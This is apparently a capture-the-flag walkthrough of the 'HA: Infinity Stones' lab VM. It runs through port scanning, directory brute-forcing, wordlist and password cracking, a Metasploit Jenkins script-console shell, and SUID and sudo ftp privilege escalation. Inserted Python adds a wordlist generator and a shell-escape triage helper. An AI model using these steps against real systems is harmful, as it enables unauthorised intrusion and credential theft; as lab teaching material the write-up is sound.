HA-Infinity Stones Walkthrough
Hello! This is HA: Infinity Stones. It is my first time doing this virtual machine, so I am going in blind and we will work through everything together in this walkthrough. Before starting: the VM ships with a bridged network adapter, so set the attacker machine to bridged as well. Our main goal is to find all six Infinity Stones. Now let's begin.
First, let's find the victim machine's IP address with “netdiscover”.
By the way, I am using Kali 2018.2 as the attacker machine.
So 192.168.0.104 is the victim's IP. Without any delay, let's scan it for open ports:
“nmap -A 192.168.0.104 -vv”. That gave me this:
So it is running four services: SSH, HTTP, SSL/HTTP and a second HTTP service. Concretely, OpenSSH 7.6p1 on port 22, Apache httpd 2.3.29 on port 80, SSL/HTTP on port 443 and Jetty 9.4.z on port 8080 (Jetty on 8080 usually means Jenkins, which is confirmed later). Let's begin with port 80: fire up Firefox and see what is inside.
Hmm, it shows some stones. After going through the page source I found nothing, but there is another page named “aether” linked in the top-left corner. Let's open it.
It asks a quiz, and reading it carefully it says “Binary is the path to Reality”. In other words, the eight yes/no answers written as 0s and 1s spell out a directory name. I don't know the answers and searching for them would take a long time, so I decided to brute-force the path instead. There are only 2^8 = 256 possible 8-character strings over '0' and '1' (eight questions, one bit per answer), so a complete wordlist is tiny. We'll let crunch generate it.
“crunch 8 8 10 > path.txt” This creates our list: minimum and maximum length 8, character set “10” (the digits 1 and 0), with the output redirected to path.txt (crunch also accepts -o path.txt).
For brute-forcing we'll use dirb:
“dirb http://192.168.0.104 path.txt” And this got me this:
Let's open that directory and see what's inside.
OK, we have something: hints.txt. Let's open it.
We have this. What is it? It is a program written in Brainfuck, an esoteric language whose programs consist only of the eight characters + - < > [ ] . and , (everything else is ignored). The hint is not encrypted; it is a Brainfuck program whose output is the real message, so all we need is an interpreter to run it.
You can run it at https://www.splitbrain.org/services/ook (the same page also handles Ook!, an equivalent dialect). After decoding I got this:
OK, some credentials, but I don't yet know where to use them. Let's look for somewhere they fit. I think we have found everything we were looking for on port 80, so let's move on to port 443.
Let's browse to “https://192.168.0.104:443”.
Again we get the same page. But we already scanned this port with nmap, so let's look at the results again for any extra information.
Look at it carefully: the ssl-cert script output gives us the MINDSTONE. Let's save it in a text file. The certificate also contains an e-mail address (firstname.lastname@example.org) belonging to aarti. I tried to find something useful with it but found nothing, so I decided to brute-force directories, this time with DirBuster.
Type “dirbuster” in a terminal to open it. I used the lowercase medium wordlist available in /usr/share/wordlists/dirbuster/ (directory-list-lowercase-2.3-medium.txt), and got these directories:
OK, we have one folder and two files. The first file is a password hint file and looks like this:
It gives a hint about the password: it starts with “gam”, then one uppercase character, two digits and two lowercase characters in the middle, and ends with the year of The Avengers (2012). That is a 12-character string with a fixed shape, which is exactly what crunch's -t option is for: in a -t pattern, , stands for an uppercase letter, % for a digit and @ for a lowercase letter, while any other character is taken literally. Let's call crunch:
“crunch 12 12 -t gam,%%@@2012 > pass.txt”
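The two wordlist steps above (the 8-bit binary path list and the gam,%%@@2012 password pattern) are both instances of one idea: take the Cartesian product of a character class for each position. The following Python reimplements that in a crunch-like way, as an added example that is not part of the original walkthrough or of crunch itself. The symbol set for ^ is an approximation (an assumption; crunch's built-in symbol list differs), and matches_pattern is an extra helper for checking a recovered password against the hint.

```python
"""Crunch-style wordlist generation: each position is a character class and
the wordlist is the Cartesian product of those classes, generated lazily."""
import itertools
import math
import string
from typing import Dict, Iterator, List

# Placeholders as crunch's -t option defines them. The ^ symbol set is an
# approximation (assumption); crunch's built-in symbol list differs slightly.
CRUNCH_CLASSES: Dict[str, str] = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}


def fixed_length(length: int, charset: str) -> Iterator[str]:
    """Equivalent of 'crunch N N CHARSET': every string of exactly N chars over CHARSET."""
    for combo in itertools.product(charset, repeat=length):
        yield "".join(combo)


def pattern_slots(pattern: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> List[str]:
    """Characters allowed at each position of PATTERN (literal characters stay literal)."""
    return [classes.get(ch, ch) for ch in pattern]


def expand_pattern(pattern: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> Iterator[str]:
    """Equivalent of 'crunch N N -t PATTERN' with N = len(PATTERN)."""
    for combo in itertools.product(*pattern_slots(pattern, classes)):
        yield "".join(combo)


def pattern_size(pattern: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> int:
    """How many candidates PATTERN expands to; check this before writing the file."""
    return math.prod(len(slot) for slot in pattern_slots(pattern, classes))


def matches_pattern(word: str, pattern: str, classes: Dict[str, str] = CRUNCH_CLASSES) -> bool:
    """True if WORD is one of the strings expand_pattern(PATTERN) would produce."""
    slots = pattern_slots(pattern, classes)
    return len(word) == len(slots) and all(ch in slot for ch, slot in zip(word, slots))


def write_wordlist(path: str, words: Iterator[str]) -> int:
    """Stream WORDS to PATH one per line (never materialised in memory); returns the count."""
    count = 0
    with open(path, "w") as fh:
        for w in words:
            fh.write(w + "\n")
            count += 1
    return count


if __name__ == "__main__":
    # The 256-entry binary directory list for the aether quiz (crunch 8 8 10).
    print("path.txt:", write_wordlist("path.txt", fixed_length(8, "10")), "entries")
    # The 12-character password shape from the hint (crunch 12 12 -t gam,%%@@2012).
    pw = "gam,%%@@2012"
    print(pw, "expands to", pattern_size(pw), "candidates")
    print("pass.txt:", write_wordlist("pass.txt", expand_pattern(pw)), "entries")
```

pattern_size shows why the password list is still manageable: 26 × 10 × 10 × 26 × 26 = 1,757,600 candidates, roughly 22 MB at 13 bytes per line, which aircrack-ng works through in minutes. Keep the generator lazy and write as you go rather than building the whole list in memory.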
Using this wordlist, let's crack the handshake captured in reality.cap with aircrack-ng:
“aircrack-ng reality.cap -w pass.txt”
After cracking we got this password:
The cracked password looks like it could be a directory name too. Let's try it.
After going to “https://192.168.0.104/gamA00fe2012” I got this:
Finally we've got the Reality Stone. Opening it gave me this:
OK, we have the Reality Stone and the Mind Stone. Let's find the remaining stones. For the third stone I ran a directory brute-force on port 80 to look for files, since we had already covered 443 and 8080. Running dirb with its default wordlist:
“dirb http://192.168.0.104”. I found a folder named 'img', and in it we got something.
Opening it, it is just an image of the Tesseract and nothing more on the surface, so I downloaded it to look at the metadata (a tool such as exiftool shows it). In the metadata I found one more stone: the spacestone.
So here is the Space Stone; copy it into the text file where we are collecting all the stones. Next, we have Jenkins on port 8080, so let's look for exploits targeting the Jenkins script console (the console lets an authenticated administrator run arbitrary Groovy on the server, which is effectively code execution). We already have credentials, “admin:avengers”, from the screenshots above. Let's open Metasploit to get the work done.
Searching in Metasploit I got several Jenkins modules.
Of these I'm going to use jenkins_script_console (exploit/multi/http/jenkins_script_console) to get a shell. Using the commands below I successfully gained a Meterpreter session:
To turn this Meterpreter session into a proper interactive shell, I used Python to spawn a pty. The screenshot below shows how:
Now we've successfully gained a shell, so it's time to escalate privileges. Let's find out which SUID binaries the jenkins user can run: a SUID-root file executes with root's privileges no matter who runs it, so any unusual one is a candidate. (This is different from sudo rights, which sudo -l lists.) To list SUID files we'll use find:
“find / -perm -u=s -type f 2>/dev/null” and it gives the output shown below:
As we can see, /opt/script is SUID root, and it is not a standard system binary, so let's exploit it by running that script. Let's go.
This script gave me the Time Stone, the fourth one; two more to go. We need to search more to find those two. Let's go.
There's a file morag.kdbx: a KeePass password database. Before we can open it we need its master password, so let's convert it into a hash and crack it with john:
“keepass2john morag.kdbx > hash”
Then run “john hash” and john does the rest.
I had already cracked it once but forgot to take a screenshot. OK, we have the password, so let's open morag.kdbx. To open this kind of file we need KeePass (or a compatible client such as KeePassXC), which you can download from the web; I am using it on a Mac. Open the file and enter the password “princesa”. After investigating I found the Power Stone.
We've found the Power Stone. Looking deeper, I also found some credentials.
They are base64 encoded (encoded, not encrypted: no key is needed). Let's decode them with the base64 tool preinstalled on our system.
It says “morag:yondu”; these may be SSH credentials, so let's log in with SSH:
“ssh morag@192.168.0.104” and enter the password “yondu”.
Now it's time for privilege escalation. After some investigation (checking sudo -l as morag) I found something new:
morag can run ftp with sudo rights and without a password. ftp has a shell escape (its ! command runs a shell command), so anything spawned from a sudo'd ftp runs as root. Let's use it to get root.
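The two checks in this escalation, SUID binaries from find and sudo rules from sudo -l, are easy to triage mechanically. The Python below parses both and flags what is worth a look: SUID files outside the normal system directories (such as /opt/script) and sudo-able programs with a well-known shell escape (such as ftp). It is an added example, not part of the original walkthrough; the sample outputs are constructed to mirror what the page describes, not copied from the box, and the shell-escape table lists a handful of GTFOBins-style entries rather than the full list.

```python
"""Triage helper for the two privilege-escalation checks used on this box:
SUID binaries (find / -perm -u=s -type f) and sudo rules (sudo -l)."""
import re
from typing import List, Tuple

# Directories where SUID binaries are expected; anything else deserves a look.
STANDARD_SUID_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                      "/usr/lib/", "/usr/libexec/", "/snap/")

# A few GTFOBins-style shell escapes (not an exhaustive list).
SHELL_ESCAPES = {
    "ftp": "run it, then type !/bin/sh at the ftp> prompt",
    "vim": "run it, then type :!/bin/sh",
    "less": "run it on any file, then type !/bin/sh",
    "find": "find . -exec /bin/sh \\; -quit",
    "python": "python -c 'import os; os.system(\"/bin/sh\")'",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
}


def interesting_suid(find_output: str) -> List[str]:
    """SUID paths from find output that live outside the standard directories."""
    paths = [line.strip() for line in find_output.splitlines() if line.strip()]
    return [p for p in paths if not p.startswith(STANDARD_SUID_DIRS)]


# One rule line as sudo -l prints it: "(runas) TAG: TAG: cmd1, cmd2"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> List[Tuple[str, bool, str]]:
    """Parse 'sudo -l' output into (run-as user, NOPASSWD?, command) triples."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = SUDO_RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def escalation_candidates(rules) -> List[Tuple[str, str, str]]:
    """Rules that hand over a root shell: ALL, or a program with a known escape."""
    hits = []
    for runas, nopasswd, cmd in rules:
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL":
            how = "sudo su (any command is allowed)"
        elif prog in SHELL_ESCAPES:
            how = SHELL_ESCAPES[prog]
        else:
            continue
        hits.append((cmd, "NOPASSWD" if nopasswd else "password required", how))
    return hits


# Constructed samples mirroring what the page describes (not real output from the box).
SAMPLE_FIND = """\
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/opt/script
"""

SAMPLE_SUDO = """\
Matching Defaults entries for morag on ubuntu:
    env_reset, mail_badpass

User morag may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/ftp
"""

if __name__ == "__main__":
    print("unusual SUID:", interesting_suid(SAMPLE_FIND))
    for cmd, auth, how in escalation_candidates(parse_sudo_l(SAMPLE_SUDO)):
        print(f"sudo {cmd} ({auth}): {how}")
```

For ftp the escape is the one this step relies on: sudo ftp, then !/bin/sh at the ftp> prompt, which spawns a root shell because the parent ftp process is already running as root.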
And then we are done. Let's open the final flag to get the Soul Stone.
“I am inevitable.” Buddy, I've got all six stones. We've successfully completed our mission. If you have doubts, please let me know.